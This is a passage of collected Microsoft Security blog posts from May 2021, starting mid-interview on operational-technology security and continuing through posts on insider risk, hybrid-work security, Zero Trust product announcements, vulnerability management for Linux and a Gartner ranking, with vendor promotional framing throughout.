Chris: Today, it’s the exception, not the rule. The only ones monitoring are the ones that have to do it, such as nuclear companies, and the 3,000 or so largest electric utilities that are under North American Electric Reliability Corporation Critical Infrastructure Protection Standards (NERC CIP) regulation, as well as any companies that might have been attacked in the past. But even NERC CIP doesn’t require continuous network security monitoring, just monitoring event logs in a SIEM, for example, which means you can still miss stuff.

So percentage-wise, it’s not very many, especially in non-regulated sectors like manufacturing, pharmaceuticals, chemicals, oil and gas, mining, and warehousing and logistics.

Companies don’t like to spend money on security if they don’t have to. Unfortunately, it’s going to take an attack. We didn’t have electric reliability standards until we had two Northeast blackouts that affected millions of people in 1965 and in August 2003. After that, they said, “Oh, we should probably have some electric reliability standards.” When I started at the power company, one of the lineman safety instructors said, “Safety rules are written in blood.” The only reason why we have reliability rules is because we’ve had darkness.

Natalia: How can teams break down IT and OT silos?

Chris: Communication. It’s the only thing you can do. If you’re in IT, go take a box of doughnuts down to the operators and ask, “What are the pain points here? How can I learn more about what you do so I can understand and so you won’t slap my hand every time I say, ‘Please patch.’” They will be overjoyed that someone came and visited them to learn about what they do.

Generally, if an IT guy with a white hard hat that has never had a scratch on it comes in, operators think, “Don’t touch anything.” But if you build that trust and communication, that strengthens an organization, and you can start training and knowledge sharing.

Natalia: What should roles and responsibilities look like?

Chris: Now, anything that’s on a network, even in the control system environment, can report up through the chief information officer (CIO) or chief information security officer (CISO). Even in power companies, they’re putting everyone, even the folks who do SCADA for the power grid, under the CIO or CISO instead of under operations. At smaller companies, like water and wastewater, it’s still the old situation, where you have an IT guy and an OT engineer or operator. At larger companies, OT is coming through the IT organization under the CIO or IT is under the CIO and operations is still under operations, and the link is under the CISO. You might have security people in IT and security people in OT.

If you’re wondering whether the CISO should be responsible for both IT and OT security, it’s a simple answer. You can’t have enterprise-wide security unless you include OT. Security needs to be applied to it all, but go to a provider that says they provide enterprise-wide security and ask, “Do you know anything about OT networks in power plants?” “Nope.” OK, then, you don’t do enterprise-wide security. You’re not protecting what makes money.

Natalia: Should companies unify IT and OT security in the security operations center (SOC)?

Chris: I’ve seen it implemented as one unified SOC, but I’ve also seen two separate ones because if they have physically separate systems, they have to have physically separate SIEMs. For instance, a nuclear plant will have its own SOC, and corporate will have its own SOC. If a power company has a nuclear power plant, that plant will have its own SOC because it’s air-gapped and not connected to the outside world or the IT network. But if you have an oil and gas environment, it may have both combined into one.

There are pros and cons. If you have the money and the budget and the people, you can do it either way. Just put your people in a room, give them a lunch of pizza, and let them come up with the best solution. There are advantages of having a unified SOC. You don’t even need an OT-specific SOC analyst. Just have a good IT security person learn from the control engineers or operators, and then create those alerts, and do hunting, tool tuning, and rule tuning.

Natalia: What would you say to a board of directors to get them to prioritize OT security?

Chris: I’d keep it short and sweet: “What would happen if you couldn’t make hammers anymore?” If the CISO can’t answer that question, you know the person needs to gain that awareness. Do we have visibility of the network? Do we have offsite backups for our control systems? Do we have security awareness training?

Board members are not concerned with the latest and greatest advanced persistent threat (ATP), but they do care about risk to the business. They’ll say, “We don’t have any security because we don’t have enough people. If we don’t have security implemented, we have a small risk of having downtime.” If you talk to any manager, they’ll know exactly how much money they lose per day if production goes down. We look at business risk in terms of the equation: risk equals impact times probability. Since we don’t have enough data about cyberattacks in OT to have a probability, we tie cybersecurity to the risk register and substitute probability with exploitability. How easy is it to exploit? Can a script kiddie do it? Could my 13-year-old son do it?

If you’ve got an operating system exposed to the Internet, discoverable via Shodan, it is exploitable within minutes. What is the impact of that? If it’s in a chemical, pharmaceutical, food factory, or refinery, that’s a problem not just for downtime but more importantly because it could cause a safety or environmental incident. If it’s a temperature gauge, that’s much less risk. Companies will have a risk register for everything else, including natural disasters. They should have one for OT cybersecurity risk too.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Mitigate OT security threats with these best practices appeared first on Microsoft Security.

How a positive hybrid work culture can help you to mitigate insider risk

May 17th, 2021 No comments

As Vasu Jakkal recently shared, we are operating in the most sophisticated threat landscape ever seen, and coupled with the next great disruption—hybrid work—security is more challenging than ever. Protecting from external threats is only one part of the challenge, though. You also must protect from the inside out—another facet of “assume breach” in your Zero Trust approach. Insider risks can be malicious or inadvertent, but all impact your most important asset: your data.

As our recent Work Trend Index showed, people are collaborating, chatting, emailing, and sharing in new ways and greater volume than ever before. Between February 2020 and February 2021, the time spent in Microsoft Teams meetings more than doubled (2.5 times) globally, the average Teams user is sending 45 percent more chats per week, the number of emails delivered to commercial and education customers is up by 40.6 billion, and we’ve seen a 66 percent increase in the number of people working on documents.

That same report also found that people are burned out. One in five global survey respondents say their employer doesn’t care about their work-life balance, with 54 percent feeling overworked and 39 percent feeling exhausted. And there are trillions of productivity signals from Microsoft 365 quantifying the precise digital exhaustion workers are feeling.

Not only does this create challenges for productivity and engagement, but it also creates risk for the organization. A recent study out of CyLab, Carnegie Mellon University’s Security and Privacy Institute—conducted with support from Microsoft—found that of the organizations who participated in the research study, 69 percent had more than 5 malicious, high-concern insider incidents in 2020, 44 percent had more than 10 incidents, and 11 percent had more than 100 incidents, such as financial fraud, sabotage, data theft, or workplace violence. The report also drew a direct correlation between the stressors impacting employees and an increase in insider risk incidents. A positive corporate culture, in which employees are engaged, rewarded, and supported, can decrease both malicious and inadvertent insider risks, such as data loss, data theft, insider trading, and others.

“A well-balanced insider risk program can become known as an advocate for employee wellbeing and a means for a more productive, engaged, connected, and committed workforce.”—Carnegie Mellon University

What can you do to mitigate risk in your organization?

  1. Listen to and empower your people: As the Work Trend Index research shows, the pandemic has taken its toll on the workforce in ways never before imagined. Stressful events can lead to individuals feeling overwhelmed or burned out, which may lead to an increase in risk for the organization. To reduce this risk and support the wellbeing of your people, it’s important that you create channels and mechanisms to listen to their concerns, giving you an opportunity to get feedback and helping them prioritize. Most importantly, ensure your people know they are valued by the organization and that they play a critical role in keeping you and your critical data safe and secure.
  2. Embrace collaboration: Insider risk management programs often focus exclusively on implementing tools and technology without incorporating the necessary organizational, risk management, and cultural considerations. Technology plays an important role, but it is just one component of an effective program. Addressing insider risk effectively requires a collaborative approach across business leaders, HR, legal, and security. It also requires education and engagement with all people in the organization.
  3. Take a holistic approach: Identifying insider risks can be complex, and it often feels like trying to find a needle in a haystack. In working with customers, we’ve found that taking a holistic, purpose-built approach that can pull signals together into a cohesive view across your organization gives you a better understanding of the relevant trends in your organization and better risk reduction. In fact, we took this approach ourselves to ensure that it’s easy to get started, yet configurable to meet your wide variety of needs. In addition to the rich set of capabilities we announced at Ignite, we recently added new capabilities, including the user activity report and activity explorer, to our insider risk management solution to expand the analytics and reporting to ensure you have the broadest view of insider risks in your organization.

As you embrace this new hybrid work world, mitigating insider risk is more critical than ever. We’re here to help as you continue this journey.

Learn more

You can learn about insider risk management and stay up to date by following our insider risk blog. You can also listen to our podcast Uncovering Hidden Risks.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How a positive hybrid work culture can help you to mitigate insider risk appeared first on Microsoft Security.

Categories: Compliance, cybersecurity Tags:

Securing a new world of hybrid work: What to know and what to do

May 12th, 2021 No comments

The cybersecurity landscape has fundamentally changed, as evidenced by large-scale, complex attacks like Nobelium, Hafnium, and more recently last week’s Colonial Pipeline attack, which signals that human-operated ransomware is on the rise.

Hackers launch an average of 50 million password attacks every day—579 per second. Phishing attacks have increased. Firmware attacks are on the rise, and ransomware has become incredibly problematic. And while Microsoft intercepted and thwarted a record-breaking 30 billion email threats last year, our work is never done.

We are now actively tracking 40 plus active nation-state actors and over 140 threat groups representing 20 countries—that number used to be a handful.

We are also rapidly delivering innovation to meet the needs of a changing landscape and you can read more about our latest product updates for RSA in a blog I published today.

Security continues to be a number one priority for our customers, especially as many companies around the world are looking to transition from remote work to hybrid. To truly meet this challenge, defenders across the industry must come together for an end-to-end, Zero Trust security approach that covers the entire technology ecosystem. Because today, digital transformation cannot happen without security transformation.

The future of work is hybrid: Here’s what we can do

Even as many people start to transition back to the office, we expect a future where hybrid work is the norm. Forrester predicts that once people have settled into their new work patterns post-pandemic, we will still see a 300 percent increase in employees working remotely from pre-pandemic levels. According to our own Work Trend Index, The Next Great Disruption is Hybrid Work—Are We Ready?, 46 percent of people plan to move because they can now work remotely.

People are working on corporate networks and home networks and moving fluidly between business and personal activity online thanks to technologies intertwined with both aspects of our daily routines. The network is changing with employees’ home networks and devices are now part of the corporate network. What this means for organizations is that the network is suddenly without firm borders.

Chart detailing the future of hybrid work. With communication at a high, networks are shifting and threats are increasing.

Our own approach

My friend and colleague Bret Arsenault, Microsoft’s Chief Information Security Officer, had the mammoth task of transitioning Microsoft and its 160,000 plus employees to remote work in March 2020 and has created our technology plan to transition to hybrid work.

Bret’s approach to solving this has been to foster a culture where security is everyone’s job. Just today, new guidance went out on a few areas:

  • Keeping devices healthy and managed: All devices that need access to corporate resources must be managed to seamlessly keep your device secure and protected from phishing and malicious websites.
  • Making security everyone’s job: We will offer new training, opportunities to provide feedback, and a new virtual security summit to ensure our employees are empowered and equipped to be more secure.
  • Securing home offices: We will continue to build and offer resources and guidelines for employees that will work remotely either part or full time.
  • Building for Zero Trust: We are asking our developers to build with a Zero Trust mentality.

While we have been remote, and as part of our Zero Trust approach, we have also been moving employees off the corporate network. An internet-first approach reduces exposure and gives employees a consistent experience whether they are at home or in the office.

We believe that security is a team sport and that when we share what we’re learning, we can all make the world a safer place. So we are sharing Bret’s guidance with our customers and partners. These specific steps will be the first of many in ensuring our hybrid workforce is as secure as possible.

There are other practical things that we will continue to focus on, and every business should consider as we move into hybrid work.

Identity is more important than ever: Use the tools you likely already have to protect it

Through NOBELIUM and other recent attacks, a clear theme has emerged—identity is the battleground for attacks of the future. We know weak passwords, password spraying, and phishing are the entry point for the vast majority of attacks. As our own CISO, Bret Arsenault, likes to say, “hackers don’t break in, they log in.”

In building a defense for our new threat landscape, the first thing every business should do is examine the tools they already have.

A great example of this is multifactor authentication (MFA). MFA is a defense that our customers have available to them, yet when looking at our own customer data, only 18 percent have it turned on. Any customer with a commercial service subscription—Azure or Microsoft 365—can turn on MFA at no additional cost.

We saw a significant jump in usage when the pandemic began. And when that happened, we saw a significant decrease in aggregate compromises—people thought they were activating to protect only remote access, but MFA protects the entire network.

We work with many kinds of organizations of all sizes—for some, implementing MFA is as easy as flipping the switch. But we understand and empathize that for others it’s much more complex. We’re actively working to make MFA rollout easier and more seamless for our customers, as well as ensuring that the end-user experience is as frictionless and friendly as possible. We are dedicated to working alongside our customers to make everyone more secure. We’ve introduced a number of programs to drive MFA adoption—from the introduction of security defaults to giving customers an entire toolset for internal communications.

Embrace a Zero Trust mindset

In a world where identity is the new battleground, adopting a Zero Trust strategy is no longer an option, it’s a new business imperative. People and organizations need to have trust in the technologies that bring them together. The term Zero Trust may feel like the opposite of that, but when you assume breach and provide the least privileged access necessary, it actually empowers employees with the flexibility and freedom they want.

The hybrid world is largely perimeterless, so wrapping protections around identity and devices is critical. As part of Zero Trust, we also think the future is passwordless and we will start to see that transition this year.

In fact, to help our customers on their Zero Trust journey we are excited to roll out a new Zero Trust assessment tool today that can help companies understand where they are currently and where they need to go.

For a deeper look at the imperatives around Zero Trust and how Microsoft is reimagining the concept of identity for a perimeterless world, read Joy Chick’s blog, 5 identity priorities for 2021—strengthening security for the hybrid work era and beyond, from Microsoft Ignite.

Take advantage of more robust security in the cloud

The benefits of the cloud for a remote or hybrid workforce are plentiful. Business-critical information can be accessed over the network, making it easy to have workers in any location.

Over the next 6 to 12 months, we will see rapid migration to the cloud, as companies recover from 2020 and implement new infrastructure. In a recent survey of our Microsoft Intelligent Security Association (MISA) partners, 90 percent reported that customers have accelerated their move to the cloud due to the pandemic.

Having a strong cloud posture also provides a level of security that most companies just couldn’t achieve on their own. And we learned from NOBELIUM that the vast majority of attacks originated on-premises, while attacks via the cloud were largely unsuccessful.

Invest in people and skills—and focus on diversity

We know that attackers exploit not just our digital holes, but the holes in our defender teams. Right now, we have two big problems: a shortage of cybersecurity professionals and a lack of diversity within teams. In the coming year, attackers will find these gaps and take advantage.

There is an estimated shortfall of 3.5 million security professionals this year—91 percent of our MISA partners report more demand than supply for cybersecurity professionals. This shortage can mean not only unfilled positions but also too much work on the shoulders of existing teams.

How do we solve this? We build the workforce of the future. We teach, train, and arm new defenders. After all, anyone can be a superhero of cybersecurity. It just takes passion and purpose—and some skilling.

I firmly believe anyone can be a defender, and with the proper training programs, we can all work together to build a cybersecurity workforce that reflects our planet. We must build diverse teams that reflect the many viewpoints of people globally, including the same demographics as the attackers themselves, to meet the security and privacy challenges of our time.

That’s why we’re pleased to offer new skilling programs and certifications across security, compliance, and identity. There are programs available for all levels of expertise, no matter where a defender is on their journey.

Fortunately, in a future where remote work is more common, the world is our oyster in terms of cultivating new and diverse talent. No longer constrained by physical office locations, it’s an exciting time to find the next generation of defenders and help them develop.

What’s next

We’re emerging from a year that has altered the world forever. It changed the way we live and work, brought new challenges in cybersecurity, and reminded all of us that there is no playbook for change.

But where there’s uncertainty, there is also the power to shape the world in positive and profound ways. At the heart of security and privacy protection is the freedom to imagine, plan, empower, and inspire.

As security professionals, it is within our superpowers to help people and organizations feel safe and be safe—to help them persist in the face of adversity with optimism, empathy, and peace of mind.

Learn more

Learn more about Microsoft’s approach to securing hybrid work, including context from our CISO Bret Arsenault, as well as a link to his new podcast Security Unlocked.

You can also assess your Zero Trust maturity stage to determine where your organization is and how to move to the next stage.

To learn more about Microsoft security solutions and how to optimize your Zero Trust strategy, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing a new world of hybrid work: What to know and what to do appeared first on Microsoft Security.

Categories: cybersecurity Tags:

How to secure your hybrid work world with a Zero Trust approach

May 12th, 2021 No comments

We are operating in the most complex cybersecurity landscape we’ve ever seen. Sophisticated and determined attackers are the norm. And we all are preparing for the next great disruption—hybrid work.

Security has never been more important, and as I shared in another Security blog today, it’s clearer than ever that a Zero Trust approach, which basically means you have to assume breach, will be critical to success. We’ve been listening and working closely with our customers around the world and rapidly innovating to help you to secure and protect your organizations. Today, I’d like to share some of our latest updates across security, compliance, identity, and management in response to that feedback to help you in your Zero Trust journey.

Strengthening your Zero Trust approach across your environment

The hybrid work environment, with some users working remotely and others in group office settings, introduces more digital attack surfaces, complexity, and risk as perimeters are now increasingly fluid. As such, a Zero Trust strategy will be top of mind for many organizations because its principles—verify explicitly, grant least privileged access, and assume breach—help maintain security amid the IT complexity that comes with hybrid work.

Verify explicitly

One of the most important first steps in a Zero Trust journey is to establish strong authentication. As Bret Arsenault, Microsoft’s CISO would say, “Hackers don’t break in. They log in.” Regardless of length or complexity, passwords alone won’t protect your account in the majority of attacks. Monitoring logins for suspicious activity and limiting or blocking access until additional proof of identity is presented drastically reduces the chances of a breach. Modern multifactor authentication (MFA) doesn’t have to be complicated for the user. We recently announced passwordless authentication and Temporary Access Pass in Azure Active Directory (Azure AD), our cloud identity solution, to help customers strengthen their access controls and simplify the user experience.

Verifying explicitly requires the ability to make real-time access decisions based on all available information for any user trying to access any resource. For us, Azure AD Conditional Access is this real-time access policy engine, which looks at all the data and signals related to the user gaining access, and today we’re announcing powerful new features that give admins more granular access controls while making it easier to control a growing list of policies. The GPS-based named locations and filters for devices enable a new set of scenarios, such as restricting access from specific countries or regions based on GPS location and securing the use of devices from Surface Hubs to privileged access workstations.

Additionally, to empower security for all, you need to be able to verify explicitly for all. We are expanding granular adaptive access controls to all users with the general availability of Azure AD Conditional Access and Identity Protection for business-to-consumer (B2C) apps and users. And we’ve made it easier to manage all your new policies with new search, sort, and filter capabilities, as well as enhanced audit logs to track recent policy changes. You can learn more on the Azure Active Directory Identity blog.

We also believe that for comprehensive protection through Zero Trust, we need to have end-to-end integration across device management and identity. New today, we are announcing the preview of filters for devices in Microsoft Endpoint Manager. These unique integrated capabilities between Microsoft Endpoint Manager (which brings together Configuration Manager and Intune) and Azure AD Conditional Access create even more granular controls. With device filters, administrators can target policies and applications to users on specific devices. For example, you can assign a filter so that a policy restriction is only applied to Surface Pro devices. You can learn more in today’s Tech Community blog.

Healthy devices and unified device management across platforms continue to be anchors of Zero trust, and to help protect data from potential leakage on mobile devices; we are introducing new conditional launch settings with App Protection Policies in Microsoft Endpoint Manager. These controls can block access or wipe data based on conditions such as maximum OS version, jailbroken or rooted devices, or require Android devices to pass SafetyNet attestation.

In addition, we are making it easier for you to manage your devices, regardless of the operating system. First, you can configure Android Enterprise-enrolled devices with Azure AD shared device mode in Microsoft Endpoint Manager. This new capability is now generally available and provides a simplified and more secure experience on devices shared across multiple users. With single sign-in, single sign-out, and data clearing across applications, shared device mode increases privacy between users and reduces the number of steps a frontline worker needs to take to access their work apps.

Then to make it easier to manage and secure your Apple devices, we recently released a Microsoft Endpoint Manager preview of the Setup Assistant for iOS, iPadOS, and macOS automated device enrollment. Based on customer feedback, you can now allow users to start using their iPadOS device immediately after enrollment without waiting for the Company Portal to install on a locked-down device. You can also configure a Conditional Access policy to require multifactor authentication either during enrollment in the Setup Assistant or upon authentication in the Company Portal. Learn more about the administrator and user experiences for shared devices and Setup Assistance in this Tech Community blog.

Finally, we continue to invest in BitLocker, which helps you to protect data at rest. BitLocker now has several enhancements, such as comprehensive modern management with Microsoft Endpoint Manager, role-based access controls for BitLocker recovery passwords, recovery password search, and recovery password auditing. Check out our BitLocker series that explains how to manage BitLocker in Microsoft Endpoint Manager, such as enabling silent encryption.

Grant least privileged access

As we have entered into new hybrid work environments, businesses need to think about how they will proactively protect their organizations from the influx of new or “bring your own” (BYO) connected devices—or even new apps that have helped people to work in new ways. This new normal has exposed the most challenging cybersecurity landscape we’ve ever encountered, and the least privileged access ensures that only what must be shared is.

To help, we recently added the ability to discover and secure unmanaged endpoints and network devices to Microsoft Defender for Endpoint. Once network devices are discovered, security administrators will receive the latest security recommendations and vulnerabilities on them. Discovered endpoints (such as workstations, servers, and mobile devices) can be onboarded to Microsoft Defender for Endpoints, allowing all its deep protection capabilities. You can learn more in the Microsoft Security blog, Secure unmanaged devices with Microsoft Defender for Endpoint now.

The early detection of vulnerabilities and misconfiguration is critical to an organization’s overall security posture, and to prevent those weaknesses from being exploited. With our commitment to support multi-platform, the threat and vulnerability management capabilities in Microsoft Defender for Endpoint now also support Linux OS, giving organizations the ability to view discovered vulnerabilities, assess the latest security recommendations, and issue remediation tasks for Linux devices. With the addition of Linux, threat and vulnerability management now covers all major platforms, including Windows and macOS.

Assume breach

Comprehensive security that is multi-platform and multi-cloud with simplification front and center is going to be important for the “assume breach” approach. With that in mind, today we are announcing the general availability of the converged portal for Microsoft 365 Defender, which unifies and simplifies XDR capabilities for endpoints, email, and collaboration. For Azure Sentinel, we are announcing solutions, which is a simplified means to deploy connectors, detections, playbooks, and workloads for both first and third-party integrations, all together as one package. To simplify team communications in the Security Operations Center, we now have built-in integration of Microsoft Teams into Azure Sentinel, so now you can create a Teams call directly from an incident.

With threats continuing to get more sophisticated, it is important to have the latest AI and machine learning capabilities at hand to separate important incidents from noise. Customers using Azure Sentinel consistently tell us how useful it is when incidents we raise are closed directly in the product. This quarter, more than 92 percent of incidents produced by Azure Sentinel’s AI were reported as useful by security professionals, which is dramatically higher than industry standards and enables you to focus on what’s important. Today we are adding new anomaly detections, including User and Entity Behavioral Analytics (UEBA) to Azure Sentinel that are powered by configurable machine learning. These anomalies can be used to provide additional context while hunting or fused with incidents. What’s powerful is that you can configure the variables for the machine learning driven anomalies with just a few clicks to customize for your specific environment.

Today’s hybrid work environment spans multiple platforms, multiple clouds, and on-premises. We recently extended the multi-cloud support in Azure Defender to include not just servers and SQL but also Kubernetes, all using Azure Arc. Azure Security Center remains the only security portal from a cloud vendor with multi-cloud support, including Azure, Amazon Web Services, and Google Cloud Platform. Today we are announcing that we are extending protection to the application level with the preview of the SAP threat monitoring solution for Azure Sentinel. This supports SAP running in any cloud or on-premises and includes continuous monitoring of SAP with built-in detections and can be customized to your specific SAP environment. You can learn more about this and the rest of Azure Sentinel’s announcements in the Tech Community blog post.

Enabling a secure way to access cloud apps while protecting your resources in this hybrid work environment is critical. New enhancements to Microsoft Cloud App Security will help protect against recent cloud-based attack types by detecting suspicious app activity and data exfiltration attempts from cloud services. Over the next few weeks, the general availability of the integration between Microsoft Information Protection and Cloud App Security will also be available. This integrated information protection policy management from the Cloud App Security portal enables greater visibility, control, and protection for your sensitive data in the cloud.

With over 90 percent of threats surfacing through email, it’s critical that organizations can configure security tools in a way that works for their environment. Over time, settings can age, new attack scenarios develop, and new security controls are available, necessitating regular review, upkeep, modifications, and even removal of old configurations. We’ve been on a journey to make it easier for customers to understand configuration gaps in their environment with recently launched features like preset security policies, Configuration Analyzer, and override alerts in Microsoft Defender for Office 365. Essentially, when Microsoft is confident that an email contains malicious content, we will not deliver the message to users, regardless of tenant configuration. We also recently announced our Secure by Default capabilities that eliminate the risks posed by legacy configurations. You can learn more in today’s Tech Community blog post.

But “assuming breach” isn’t just about external threats—you also have to be thoughtful about protecting your organization from the inside out. We released new capabilities today in our Insider Risk Management solution to help you to address insider risk in a holistic, collaborative way. Today’s Tech Community blog has more details.

For investigations, eDiscovery is critical. Today we’re announcing that eDiscovery support for Microsoft Graph connectors will be available in Summer 2021 as a developer preview. With Microsoft Graph connectors, investigators can query across more than 130 systems—directly from Microsoft 365 and our partners. Use the same eDiscovery tools in Microsoft 365 to search for content in third-party systems connected to Microsoft Search as used to search for content in Microsoft 365 apps and services. You can learn more in today’s Tech Community blog post.

Your Zero Trust journey

In a risk landscape as complex as today’s, your adoption of a Zero Trust approach won’t happen overnight. It’s important to value progress over perfection and to enlist help when you need it. Microsoft and its partners are committed to helping you on this journey. To chart out your path, or assess your progress, enable a remote workforce by embracing Zero Trust security.

Thank you for being part of our community and doing your part to build a safer world.

Learn more about Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to secure your hybrid work world with a Zero Trust approach appeared first on Microsoft Security.

Threat and Vulnerability Management now supports all major platforms

May 11th, 2021 No comments

We are swiftly adapting to the lasting reality of a hybrid workforce, with the number of remote workers in the US expected to nearly double over the next five years, compared to pre-pandemic times. As a result, security teams are being challenged to rethink how to secure a growing and increasingly diverse portfolio of devices outside of the traditional boundaries of their organization. However, what has stayed constant during this time of change is the focus of adversaries to identify and take advantage of vulnerabilities that have been left unpatched or misconfigurations as a gateway to sensitive information. It stresses the need for a proactive approach to vulnerability management and a focus on an organization’s high-risk assets.

Microsoft’s Threat and Vulnerability Management (TVM) capabilities play a crucial role in monitoring an organization’s overall security posture, with devices being a key entry point for compromise if left exposed. It equips customers with real-time insights into risk with continuous vulnerability discovery, intelligent prioritization that takes business and threat context into account, and the ability to seamlessly remediate vulnerabilities with a single click. The recent  Nobelium attack is only one example of a critical vulnerability, where TVM enabled customers to identify affected devices in their environment and take immediate action.

As threat and vulnerability management evolves, we continue to expand our coverage to include additional devices and OS platforms. Today, we are announcing that Microsoft’s Threat and Vulnerability Management capabilities now cover Linux operating systems, in addition to macOS and Windows—with support for Android and iOS planned for later this summer.

Organizations can now review recently discovered vulnerabilities within installed applications across the Linux OS and issue remediation tasks for all affected devices. Initial support is available for RHEL, CentOS, and Ubuntu, with Oracle Linux, CentOS, SUSE, and Debian being added shortly. In addition, TVM now also provides secure configuration assessment capabilities for Linux and macOS. These allow organizations to discover, prioritize, and remediate dozens of insecure configurations to improve their overall security posture.

Security recommendation to update Google Chrome for Windows, macOs, and Linux.

Figure 1: Security recommendation to update Google Chrome for Windows, macOS, and Linux.

Details of all vulnerabilities associated with Google Chrome for Linux.

Figure 2: Details of all vulnerabilities associated with Google Chrome for Linux.

Security configuration recommendation for macOS.

Figure 3: Security configuration recommendation for macOS.

Microsoft’s investment in cross-platform coverage now enables customers to take full advantage of the powerful TVM capabilities on all major platforms across managed and unmanaged devices. They are available in Microsoft Defender for Endpoint as part of an integrated experience that provides device context, prioritizes based on risk, and minimizes time to remediation across their entire portfolio of managed and unmanaged devices.

An added focus on interoperability

As we continue to expand the coverage for our TVM capabilities and remain focused on providing natively integrated experiences across the Microsoft portfolio, we are also partnering with industry-leading solution providers to ensure the interoperability of our solution.

We understand that our customers have existing investments and established processes to run their security and IT operations. That is why a broad ecosystem of integration partners is a critical focus as we continue to grow our vulnerability management capabilities. Customers can already leverage integrations with Skybox, Kenna Security, and ServiceNow Vulnerability Response, and we are actively working on expanding this list.

In addition, the Threat and vulnerability management APIs give customers and partners full access to the threat and vulnerability management dataset, including vulnerability assessment, security configuration assessment, and the software inventory for all devices. This enables any partner to leverage and integrate threat and vulnerability management data into their platforms and create custom solutions with the available data set.

As a hybrid workforce becomes the new normal and organizations continue to face new security challenges, Microsoft Threat and Vulnerability Management enables better insight into organizational risk and the overall security posture of their devices. With a focus on broad platform support and interoperability, we are committed to providing customers with the flexibility and coverage they need to detect vulnerabilities and misconfigurations early on and make remediation simple.

Learn more

Microsoft Threat and Vulnerability Management bridges the gap between security and IT teams to seamlessly remediate vulnerabilities and reduce risk in your organization. It is deeply integrated with Microsoft’s portfolio of security and IT management solutions, and you can sign up for a free trial today or get started even faster with our interactive guide.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Threat and Vulnerability Management now supports all major platforms appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant

May 11th, 2021 No comments

Our mission to empower defenders and protect and secure organizations has never been more important to us. Over the last year, our customers have faced unpredictable challenges and nearly overnight have had to quickly adapt in the face of a new hybrid work environment, evolving sophistication and scope of threats, and global and economic uncertainty. The trust that customers have put into us through this journey has been humbling. No matter what the future holds, we are deeply committed to continuing to help customers prepare and adapt with security innovation that offers the best protection, detection, and response in their multi-cloud, multi-platform environments and empowers defenders to move ahead of the speed of an attack.

We are so grateful to our customers who have collaborated with us in creating one of the best endpoint security solutions on the market and are thrilled that Gartner has recognized this work and the journey we’ve taken alongside our customers by naming Microsoft a Leader in the 2021 Endpoint Protection Platforms (EPP) Magic Quadrant, positioned highest on the ability to execute.

2021 Gartner Magic Quadrant for Endpoint Protection Platforms. Quadrants include Leaders, Challengers, Niche Players, and Visionaries.

According to Gartner, Leaders “have broad capabilities in advanced malware protection, and proven management capabilities for large enterprise accounts. Increasingly, Leaders provide holistic XDR platforms that allow customers to consolidate their other tools and adopt a single-vendor solution.”

Our evolution in the endpoint security space has been accelerating with the release of proven security capabilities that are central to our customer’s needs, including:

All of these innovations are seamlessly built into Microsoft 365 Defender, our solution offering XDR capabilities for identities, endpoints, cloud apps, email, and documents. Microsoft 365 Defender delivers intelligent, automated, and integrated security in a unified SecOps experience, with detailed threat analytics and insights, unified threat hunting, and rapid detection and automation across domains—detecting and stopping attacks anywhere in the kill chain and eliminating persistent threats.

You can download the complimentary report to get more details on our positioning as a Leader. Our customers and partners have been on this incredible journey with us, and for that, we owe our immense gratitude and share this recognition with them.

Learn more

Microsoft Defender for Endpoint is an industry-leading, cloud-powered endpoint security solution offering vulnerability management, endpoint protection, endpoint detection and response, and mobile threat defense. With our solution, threats are no match. If you are not yet taking advantage of Microsoft’s unrivaled threat optics and proven capabilities, sign up for a free trial of Microsoft Defender for Endpoint today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Dionisio Zumerle, Prateek Bhajanka, Lawrence Pingree, Paul Webber, 05 May 2021.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request here.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant appeared first on Microsoft Security.

Categories: cybersecurity Tags:

2021 年 5 月のセキュリティ更新プログラム (月例)

Categories: Uncategorized Tags: